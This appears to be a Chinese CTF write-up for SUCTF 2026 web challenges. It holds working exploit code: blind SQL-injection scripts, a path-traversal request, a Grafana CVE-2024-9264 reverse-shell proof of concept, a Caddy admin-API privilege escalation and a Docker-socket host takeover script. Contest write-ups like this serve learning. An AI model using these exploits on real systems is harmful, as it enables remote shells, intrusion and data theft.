root = try_recover_from_polys(polys, X_BOUND, K_BOUND)
if root is None:
print(" no root found with this m")
continue

xr, kr = root
print(f"[+] found candidate root: x = {xr}, k = {kr}")

ans = recover_flag(xr, kr)
if ans is None:
print(" candidate root did not validate")
continue

print("[+] SUCCESS!")
print("[+] p =", ans["p"])
print("[+] q =", ans["q"])
print("[+] d =", ans["d"])
print("[+] flag =", ans["flag"])
return

print("[-] attack failed with all tried parameters. Consider increasing m or adjusting bounds.")


if __name__ == "__main__":
main()

flag:SUCTF{congratulation_you_know_small_d_with_hint_factor}

WEB(LFischl)

SU_sqli

根据检测,过滤了and or -- union

数据库ctfsecrets列名:flag

exp

先获取数据库和数据表

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time
import json

# ================== 配置区域 ==================
TARGET_URL = "http://101.245.108.250:10003" # 根据实际端口修改
CHROME_OPTIONS = Options()
CHROME_OPTIONS.add_argument("--disable-blink-features=AutomationControlled")
CHROME_OPTIONS.add_experimental_option("excludeSwitches", ["enable-automation"])
CHROME_OPTIONS.add_experimental_option('useAutomationExtension', False)
# CHROME_OPTIONS.add_argument("--headless") # 无头模式(根据需要取消注释)
# =============================================

def init_driver():
driver = webdriver.Chrome(options=CHROME_OPTIONS)
driver.get(TARGET_URL)
WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.ID, "q")))
return driver

def do_query(driver, payload):
"""发送 payload,返回 out 文本和 err 文本,并打印调试信息"""
search_box = driver.find_element(By.ID, "q")
search_box.clear()
search_box.send_keys(payload)
driver.find_element(By.ID, "run").click()
WebDriverWait(driver, 10).until(
lambda d: d.find_element(By.ID, "out").text != "" or d.find_element(By.ID, "err").text != ""
)
out = driver.find_element(By.ID, "out").text
err = driver.find_element(By.ID, "err").text
# print(f"\n[发送] payload: {payload}")
# if out:
# print(f"[out] {out[:200]}{'...' if len(out)>200 else ''}")
if err:
print(f"[err] {err[:200]}{'...' if len(err)>200 else ''}")
return out, err

def has_service_record(out):
"""判断输出中是否包含 Service 记录(即条件为真)"""
try:
data = json.loads(out)
if isinstance(data, list) and len(data) > 0:
for item in data:
if item.get("title") == "Service status":
return True
except:
pass
return False

def is_true(driver, condition_sql):
"""
构造 payload: ' || (SELECT CASE WHEN ({condition}) THEN 'Service' ELSE 'xxx' END) || '
如果页面返回了 Service 记录,则 condition 为真。
"""
payload = f"' || (SELECT CASE WHEN ({condition_sql}) THEN 'Service' ELSE 'xxx' END) || '"
out, err = do_query(driver, payload)
if err:
return False
return has_service_record(out)

def blind_extract(driver, query_prefix, max_len=50, charset=None):
"""
通用盲注提取字符串。
query_prefix: 用于提取第 {pos} 位字符的 SQL 片段,例如 "SELECT substr(flag,{pos},1) FROM secrets LIMIT 1 OFFSET 0"
条件构造为: ({query})='{c}'
"""
if charset is None:
# 扩展字符集:字母数字 + 空格 + 常见符号(排除单引号以免破坏语法)
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 _{}!?@#$%^&*()[]/\\-+=:;.,"
result = ""
for pos in range(1, max_len + 1):
found = False
for c in charset:
condition = f"({query_prefix.format(pos=pos)})='{c}'"
if is_true(driver, condition):
result += c
print(f"[+] 第 {pos} 位: {c} -> {result}")
found = True
break
if not found:
break
return result

def get_database_name(driver):
"""获取当前数据库名称"""
print("[*] 正在获取当前数据库名称...")
len_condition = "SELECT length(current_database())"
db_len = 0
for l in range(1, 50):
if is_true(driver, f"({len_condition})={l}"):
db_len = l
break
if db_len == 0:
print("[-] 无法获取数据库名长度")
return None
query = "SELECT substr(current_database(),{pos},1)"
db_name = blind_extract(driver, query, max_len=db_len)
print(f"[+] 当前数据库: {db_name}")
return db_name

def get_all_tables(driver):
"""枚举当前数据库中所有用户表(public 模式)"""
print("[*] 开始枚举所有用户表...")
tables = []
# 先获取表的总数
count_condition = "SELECT count(*) FROM pg_tables WHERE schemaname='public'"
table_count = 0
for i in range(1, 100):
if is_true(driver, f"({count_condition})={i}"):
table_count = i
break
if table_count == 0:
print("[-] 未找到任何用户表")
return tables
print(f"[+] 共有 {table_count} 个用户表")

for index in range(table_count):
# 获取第 index 个表的名称长度
len_condition = f"SELECT length(tablename) FROM pg_tables WHERE schemaname='public' ORDER BY tablename LIMIT 1 OFFSET {index}"
name_len = 0
for l in range(1, 50):
if is_true(driver, f"({len_condition})={l}"):
name_len = l
break
if name_len == 0:
continue
# 提取表名
query = f"SELECT substr(tablename,{{pos}},1) FROM pg_tables WHERE schemaname='public' ORDER BY tablename LIMIT 1 OFFSET {index}"
table_name = blind_extract(driver, query, max_len=name_len)
tables.append(table_name)
print(f"[+] 发现表: {table_name}")
return tables

def main():
driver = init_driver()
try:
# 验证 Service 记录可用
out, err = do_query(driver, "Service")
if not has_service_record(out):
print("[-] 无法获取 Service 记录,请检查目标。")
return
print("[+] Service 记录可用。")

# 获取数据库名(可选)
db_name = get_database_name(driver)
if db_name:
print(f"[*] 当前数据库: {db_name}")

# 获取所有用户表
tables = get_all_tables(driver)
if not tables:
print("[-] 没有找到任何表,退出。")
return
print(f"[+] 所有表: {tables}")

# 对每个表,获取列并提取数据
for table in tables:
print(f"\n{'='*50}\n处理表: {table}")
columns = get_columns_of_table(driver, table)
if not columns:
continue
row_count = get_row_count(driver, table)
print(f"[+] 表 {table} 共有 {row_count} 行")
if row_count == 0:
continue
for col in columns:
print(f"\n[*] 提取列 {col} 的数据:")
for row in range(row_count):
data = extract_column_data(driver, table, col, row)
if data is not None:
print(f" 行 {row}: {col} = {data}")
if "flag" in data or "{" in data:
print(f"\n[!] 疑似 flag: {data}")
else:
print(f" 行 {row}: 无数据")
print('='*50)

finally:
driver.quit()

if __name__ == "__main__":
main()

再获取列名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support import expected_conditions as EC
import time
import json

TARGET_URL = "http://101.245.108.250:10003"
CHROME_OPTIONS = Options()
CHROME_OPTIONS.add_argument("--disable-blink-features=AutomationControlled")
CHROME_OPTIONS.add_experimental_option("excludeSwitches", ["enable-automation"])
CHROME_OPTIONS.add_experimental_option('useAutomationExtension', False)

def init_driver():
driver = webdriver.Chrome(options=CHROME_OPTIONS)
driver.get(TARGET_URL)
WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.ID, "q")))
return driver

def do_query(driver, payload, retries=3):
for attempt in range(retries):
try:
search_box = driver.find_element(By.ID, "q")
search_box.clear()
search_box.send_keys(payload)
driver.find_element(By.ID, "run").click()
WebDriverWait(driver, 20).until(
lambda d: d.find_element(By.ID, "out").text != "" or d.find_element(By.ID, "err").text != ""
)
out = driver.find_element(By.ID, "out").text
err = driver.find_element(By.ID, "err").text
time.sleep(0.5) # 避免请求过快
if err:
print(f"[err] {err[:200]}")
return out, err
except TimeoutException:
print(f"[!] 第 {attempt+1} 次尝试超时,重试中...")
continue
raise Exception("多次重试后仍然超时")

def has_service_record(out):
try:
data = json.loads(out)
if isinstance(data, list) and len(data) > 0:
for item in data:
if item.get("title") == "Service status":
return True
except:
pass
return False

def is_true(driver, condition_sql):
payload = f"' || (SELECT CASE WHEN ({condition_sql}) THEN 'Service' ELSE 'xxx' END) || '"
out, err = do_query(driver, payload)
if err:
return False
return has_service_record(out)

def blind_extract(driver, query_prefix, max_len=50, charset=None):
if charset is None:
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 _{}!?@#$%^&*()[]-+=:;.,"
result = ""
for pos in range(1, max_len + 1):
found = False
for c in charset:
condition = f"({query_prefix.format(pos=pos)})='{c}'"
if is_true(driver, condition):
result += c
print(f"[+] 第 {pos} 位: {c} -> {result}")
found = True
break
if not found:
break
return result

def get_column_count(driver, table):
for i in range(1, 50):
if is_true(driver, f"(SELECT relnatts FROM pg_class WHERE relname='{table}') = {i}"):
return i
return 0

def get_column_name(driver, table, col_index):
len_sql = f"SELECT length(attname) FROM pg_attribute WHERE CASE WHEN attrelid = (SELECT oid FROM pg_class WHERE relname='{table}') THEN CASE WHEN attnum = {col_index} THEN 1 ELSE 0 END ELSE 0 END = 1"
name_len = 0
for l in range(1, 50):
if is_true(driver, f"({len_sql}) = {l}"):
name_len = l
break
if name_len == 0:
return None
name_sql = f"SELECT substr(attname,{{pos}},1) FROM pg_attribute WHERE CASE WHEN attrelid = (SELECT oid FROM pg_class WHERE relname='{table}') THEN CASE WHEN attnum = {col_index} THEN 1 ELSE 0 END ELSE 0 END = 1"
col_name = blind_extract(driver, name_sql, max_len=name_len)
return col_name

def get_row_count(driver, table):
for i in range(0, 100):
if not is_true(driver, f"EXISTS (SELECT 1 FROM {table} LIMIT 1 OFFSET {i})"):
return i
return 0

def extract_column_data(driver, table, column, row_index):
if not is_true(driver, f"EXISTS (SELECT 1 FROM {table} LIMIT 1 OFFSET {row_index})"):
return None
len_condition = f"SELECT length({column}) FROM {table} LIMIT 1 OFFSET {row_index}"
data_len = 0
for l in range(1, 100):
if is_true(driver, f"({len_condition})={l}"):
data_len = l
break
if data_len == 0:
return ""
query = f"SELECT substr({column},{{pos}},1) FROM {table} LIMIT 1 OFFSET {row_index}"
data = blind_extract(driver, query, max_len=data_len)
return data

def main():
driver = init_driver()
try:
out, err = do_query(driver, "Service")
if not has_service_record(out):
print("[-] 无法获取Service记录")
return
print("[+] Service记录可用。")

table = "secrets"
col_count = get_column_count(driver, table)
if col_count == 0:
print("[-] 无法获取列数")
return
print(f"[+] 表 {table} 共有 {col_count} 列")

columns = []
for i in range(1, col_count + 1):
col_name = get_column_name(driver, table, i)
if col_name:
columns.append(col_name)
print(f"[+] 第 {i} 列: {col_name}")
else:
print(f"[-] 无法获取第 {i} 列名")

if not columns:
return

row_count = get_row_count(driver, table)
print(f"[+] 表 {table} 共有 {row_count} 行")

for col in columns:
print(f"\n[*] 提取列 {col} 的数据:")
for row in range(row_count):
data = extract_column_data(driver, table, col, row)
if data is not None:
print(f" 行 {row}: {col} = {data}")
else:
print(f" 行 {row}: (无数据)")
finally:
driver.quit()

if __name__ == "__main__":
main()

flag:SUCTF{P9s9L_!Nject!On_IS_3@$Y_RiGht}

SU_Thief

运气比较好,在环境出了问题时直接运行代码就解了,之后发现这个代码跑不通了,原因是访问除登录的界面后都是 302 跳转,所以这个是非预期解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
import socket

def exploit():
host = "156.239.26.40"
port = 13334
# /login/../../root/flag 会尝试访问服务器根目录下的 flag 文件
payload = (
"GET /login/../../root/flag HTTP/1.1\r\n"
f"Host: {host}:{port}\r\n"
"User-Agent: SU_Thief\r\n"
"Connection: close\r\n"
"\r\n"
)

try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.sendall(payload.encode())

response = b""
while True:
data = s.recv(4096)
if not data:
break
response += data

s.close()

# 输出响应结果
print(response.decode(errors='ignore'))

except Exception as e:
print(f"Error: {e}")

if __name__ == "__main__":
exploit()

flag:SUCTF{c4ddy_4dm1n_4p1_2019_pr1v35c}

复现

poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
import requests
import argparse

"""
Grafana Remote Code Execution (CVE-2024-9264) via SQL Expressions
See here: https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/

Author: z3k0sec // www.zekosec.com
"""

def authenticate(grafana_url, username, password):
"""
Authenticate to the Grafana instance.

Args:
grafana_url (str): The URL of the Grafana instance.
username (str): The username for authentication.
password (str): The password for authentication.

Returns:
session (requests.Session): The authenticated session.
"""
# Login URL
login_url = f'{grafana_url}/login'

# Login payload
payload = {
'user': username,
'password': password
}

# Create a session to persist cookies
session = requests.Session()

# Perform the login
response = session.post(login_url, json=payload)

# Check if the login was successful
if response.ok:
print("[SUCCESS] Login successful!")
return session # Return the authenticated session
else:
print("[FAILURE] Login failed:", response.status_code, response.text)
return None # Return None if login fails

def create_reverse_shell(session, grafana_url, reverse_ip, reverse_port):
"""
Create a malicious reverse shell payload in Grafana.

Args:
session (requests.Session): The authenticated session.
grafana_url (str): The URL of the Grafana instance.
reverse_ip (str): The IP address for the reverse shell.
reverse_port (str): The port for the reverse shell.
"""
# Construct the reverse shell command
reverse_shell_command = f"/dev/tcp/{reverse_ip}/{reverse_port} 0>&1"

# Define the payload to create a reverse shell
payload = {
"queries": [
{
"datasource": {
"name": "Expression",
"type": "__expr__",
"uid": "__expr__"
},
# Using the reverse shell command from the arguments
"expression": f"SELECT 1;COPY (SELECT 'sh -i >& {reverse_shell_command}') TO '/tmp/rev';",
"hide": False,
"refId": "B",
"type": "sql",
"window": ""
}
]
}

# Send the POST request to execute the payload
response = session.post(
f"{grafana_url}/api/ds/query?ds_type=__expr__&expression=true&requestId=Q100",
json=payload
)

if response.ok:
print("Reverse shell payload sent successfully!")
print("Set up a netcat listener on " + reverse_port)
else:
print("Failed to send payload:", response.status_code, response.text)

def trigger_reverse_shell(session, grafana_url):
"""
Trigger the reverse shell binary.

Args:
session (requests.Session): The authenticated session.
grafana_url (str): The URL of the Grafana instance.
"""
# SQL command to trigger the reverse shell
payload = {
"queries": [
{
"datasource": {
"name": "Expression",
"type": "__expr__",
"uid": "__expr__"
},
# install and load the community extension "shellfs" to execute system commands (here: execute our reverse shell)
"expression": "SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('bash /tmp/rev |');",
"hide": False,
"refId": "B",
"type": "sql",
"window": ""
}
]
}

# Trigger the reverse shell via POST
response = session.post(
f"{grafana_url}/api/ds/query?ds_type=__expr__&expression=true&requestId=Q100",
json=payload
)

if response.ok:
print("Triggered reverse shell successfully!")
else:
print("Failed to trigger reverse shell:", response.status_code, response.text)

def main(grafana_url, username, password, reverse_ip, reverse_port):
# Authenticate to Grafana
session = authenticate(grafana_url, username, password)

if session:
# Create the reverse shell payload
create_reverse_shell(session, grafana_url, reverse_ip, reverse_port)

# Trigger the reverse shell binary
trigger_reverse_shell(session, grafana_url)

if __name__ == "__main__":
# Set up command line argument parsing
parser = argparse.ArgumentParser(description='Authenticate to Grafana and create a reverse shell payload')
parser.add_argument('--url', required=True, help='Grafana URL (e.g., http://127.0.0.1:3000)')
parser.add_argument('--username', required=True, help='Grafana username')
parser.add_argument('--password', required=True, help='Grafana password')
parser.add_argument('--reverse-ip', required=True, help='Reverse shell IP address')
parser.add_argument('--reverse-port', required=True, help='Reverse shell port')

args = parser.parse_args()

# Call the main function with the provided arguments
main(args.url, args.username, args.password, args.reverse_ip, args.reverse_port)

直接反弹 shell:

权限不够,所以要提权

看下进程

发现有一个 caddy 比较可疑,还是 root 启动的,还暴漏了配置文件,所以可以复写这个文件进行提权

看一下 caddy 的默认端口,发现返回了配置文件的东西

整理一下发现还是这个,所以这个口是通的,也就是说,Caddy 管理 API 在 127.0.0.1:2019 开着

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
{
"apps": {
"http": {
"servers": {
"srv0": {
"listen": [
":80"
],
"routes": [
{
"handle": [
{
"handler": "reverse_proxy",
"upstreams": [
{
"dial": "127.0.0.1:3000"
}
]
}
]
}
]
}
}
}
}
}

把 root 加进去

1
2
3
4
5
6
7
8
9
10
11
curl -X PUT http://127.0.0.1:2019/config/apps/http/servers/srv0/routes/0 \
-H 'Content-Type: application/json' \
-d '{
"handle": [{
"handler": "file_server",
"root": "/"
}],
"match": [{
"path": ["/root/*"]
}]
}'

它不是修改原来的 srv0,而是在 servers 下面新增一个新的配置项,名字叫 get_flag。也就是说,原来的站点继续存在,这里额外再开一个新服务。表示这个新 server 监听容器内的 8888 端口。也就是说,Caddy 除了原本监听 :80 的 srv0 之外,现在又多了一个监听 :8888 的 get_flag。

flag:SUCTF{c4ddy_4dm1n_4p1_2019_pr1v35c}

SU_uri(复现)

题目环境说明

经过测试发现,本题无法进行 ssrf, 因为在当前本地环境中,原始 WP 依赖的两个前提不稳定或不存在:宿主机未开放 Docker Remote API 2375,公网 DNS Rebinding 域名未成功把请求重绑定到 Docker API

所以本题不是严格复现原题在比赛环境下的完整利用链,而是针对本地 Docker Desktop 环境,复现题目的思路:

  1. 可以控制 Docker 创建容器。2. 可以把宿主机根目录挂进新容器。3. 可以执行宿主机上的 /readflag

docker 启动题目

在题目环境目录执行:

1
2
cd D:\ctf\Game\SUCTF-2026-main\web\SU_uri\env\web_deploy
docker compose up -d --build

启动完成后,服务默认监听:

1
http://127.0.0.1:8080

题目解答

抓包发现这个 webhook 是这样子的

1
2
3
4
5
6
try {
const resp = await fetch('/api/webhook', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ url, body })
});

并且 127.0.0.1 会被 ban,测试发现后端确实拦截了明显的本地和私网地址,看源码发现确实 ban 掉了很多

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
var blockedIPv4Ranges = []netip.Prefix{
netip.MustParsePrefix("0.0.0.0/8"),
netip.MustParsePrefix("127.0.0.0/8"),
netip.MustParsePrefix("10.0.0.0/8"),
netip.MustParsePrefix("172.16.0.0/12"),
netip.MustParsePrefix("192.168.0.0/16"),
netip.MustParsePrefix("169.254.0.0/16"),
netip.MustParsePrefix("100.64.0.0/10"),
}

var blockedIPv6Ranges = []netip.Prefix{
netip.MustParsePrefix("::1/128"),
netip.MustParsePrefix("fc00::/7"),
netip.MustParsePrefix("fe80::/10"),
}

服务容器挂载了宿主机的 Docker Socket 和宿主机根目录。这样一来,只要攻击者能让服务端请求到 Docker API,就等于拿到了“创建任意容器”的能力;再配合把宿主机根目录挂进新容器,就可以在新容器中执行宿主机上的 /readflag,最终拿到 flag。/readflag 是题目启动时编译到宿主机根目录的 SUID 程序,执行后会直接输出真实 flag。本题就绑定为 /mnt,然后执行宿主机上的 /mnt/readflag。

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
#!/usr/bin/env python3                      # 指定使用 python3 解释器运行脚本
import argparse # 处理命令行参数
import subprocess # 用来调用本机 docker 命令
import sys # 用来输出错误信息和返回退出码
import uuid # 生成随机容器名,避免重名


def run(cmd: list[str], check: bool = True) -> subprocess.CompletedProcess[str]:
return subprocess.run( # 执行外部命令
cmd, # 命令本体,例如 ["docker", "pull", "alpine:latest"]
check=check, # True 表示命令失败时抛异常
text=True, # 让输入输出按文本处理,而不是字节流
capture_output=True # 捕获标准输出和标准错误,便于脚本后续打印
)


def docker(*args: str, check: bool = True) -> subprocess.CompletedProcess[str]:
return run(["docker", *args], check=check) # 给 docker 命令做一层简单封装,调用时不用每次手写 "docker"


def image_exists(image: str) -> bool:
res = docker("image", "inspect", image, check=False) # 检查本地是否已有指定镜像
return res.returncode == 0 # inspect 成功说明镜像存在


def main() -> int:
parser = argparse.ArgumentParser( # 创建命令行参数解析器
description="Local reproduction for SU_uri post-SSRF Docker takeover"
)
parser.add_argument(
"--image", # 允许用户指定辅助容器镜像
default="alpine:latest", # 默认使用 alpine:latest
help="Image used for the helper container",
)
parser.add_argument(
"--keep", # 是否保留创建出的辅助容器
action="store_true", # 只要带了 --keep 就是 True
help="Keep the helper container after execution",
)
args = parser.parse_args() # 真正解析命令行参数

container_name = f"su-uri-local-{uuid.uuid4().hex[:8]}" # 生成随机容器名,避免已有同名容器冲突
print(f"[*] helper image : {args.image}") # 打印将要使用的辅助镜像名
print(f"[*] container : {container_name}") # 打印将要创建的容器名

try:
if image_exists(args.image): # 如果本地已经有 alpine:latest
print("[*] helper image already exists locally, skip pull") # 就不再拉取,避免镜像源出问题
else:
print("[*] pulling helper image") # 否则尝试拉取镜像
pull_res = docker("pull", args.image, check=False) # pull 失败时先不抛异常,留给后面判断
if pull_res.stdout.strip():
print(pull_res.stdout.strip()) # 有标准输出就打印出来
if pull_res.returncode != 0: # 如果 pull 返回非 0,说明拉取失败
if pull_res.stderr:
sys.stderr.write(pull_res.stderr) # 把错误信息写到标准错误
if not image_exists(args.image): # 再检查一次本地是否真的没有镜像
return pull_res.returncode or 1 # 如果确实没有镜像,脚本终止
print("[*] pull failed, but local image exists, continuing") # 否则继续执行

print("[*] creating container with host root mounted at /mnt") # 开始创建辅助容器
create_res = docker(
"create", # 对应 docker create
"--name", # 指定容器名
container_name, # 使用前面生成的随机容器名
"-v", # 指定 volume 挂载
"/:/mnt", # 把宿主机根目录 / 挂载到容器里的 /mnt
args.image, # 选择使用的镜像
"sh", # 容器启动后运行 sh
"-lc", # 用 shell 执行一整段命令字符串
"ln -sf /mnt/flag /flag && /mnt/readflag", # 建软链接后执行宿主机上的 readflag
)
container_id = create_res.stdout.strip() # docker create 成功后会输出容器 ID
print(f"[+] container id : {container_id}") # 打印容器 ID

print("[*] starting container") # 启动刚创建的容器
docker("start", container_name)

print("[*] reading container logs") # 读取容器标准输出,也就是 readflag 的输出
logs_res = docker("logs", container_name)
output = logs_res.stdout.strip() # 去掉首尾空白,得到最终输出内容
print("\n" + "=" * 40) # 打印分隔线
print("FLAG OUTPUT:") # 输出标题
print(output or "<empty>") # 打印 flag;如果为空则显示 <empty>
print("=" * 40) # 结束分隔线
except subprocess.CalledProcessError as exc: # 如果 docker 某一步报错,会进入这里
if exc.stdout:
sys.stdout.write(exc.stdout) # 打印标准输出,便于排查
if exc.stderr:
sys.stderr.write(exc.stderr) # 打印标准错误,便于排查
return exc.returncode or 1 # 返回 docker 命令的退出码
finally:
if not args.keep: # 如果用户没有指定保留容器
docker("rm", "-f", container_name, check=False) # 无论成功失败,都强制删除辅助容器

return 0 # 一切成功,返回 0


if __name__ == "__main__":
raise SystemExit(main()) # 作为主程序运行时,执行 main 并把返回值作为退出码

这个脚本先检查辅助镜像 alpine:latest 是否存在,本地存在就跳过拉取,避免被镜像源故障影响。这也是你第一次失败、第二次成功的原因。第一次报错时镜像拉取阶段访问了配置的镜像源,返回 EOF;第二次因为镜像已经在本地,脚本直接跳过了 pull。

然后创建一个新的辅助容器,关键参数是 -v /:/mnt。这一步把宿主机的整个根目录挂载到了辅助容器的 /mnt。因此,辅助容器内部访问 /mnt/readflag,实际上就是在执行宿主机上的 /readflag。

接着启动容器,容器会运行:

ln -sf /mnt/flag /flag && /mnt/readflag

这里的 /mnt/flag 对应宿主机上的 /flag,/mnt/readflag 对应宿主机上的 /readflag。其中 /flag 是诱饵,真正输出 flag 的是 /readflag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
PS D:\ctf\Game\SUCTF-2026-main\web\SU_uri\exp> python .\exp_local.py
[*] helper image : alpine:latest
[*] container : su-uri-local-31606810
[*] helper image already exists locally, skip pull
[*] creating container with host root mounted at /mnt
[+] container id : e3b9154d5faecdcb853b13a6e2e737f9109f9430fed9b9367ed5132498e2ac7a
[*] starting container
[*] reading container logs

========================================
FLAG OUTPUT:
SUCTF{I_LOVE_FISCHL!}
#SUCTF{SsRF_tO_rC3_by_d0CkEr_15_s0_FUn}
========================================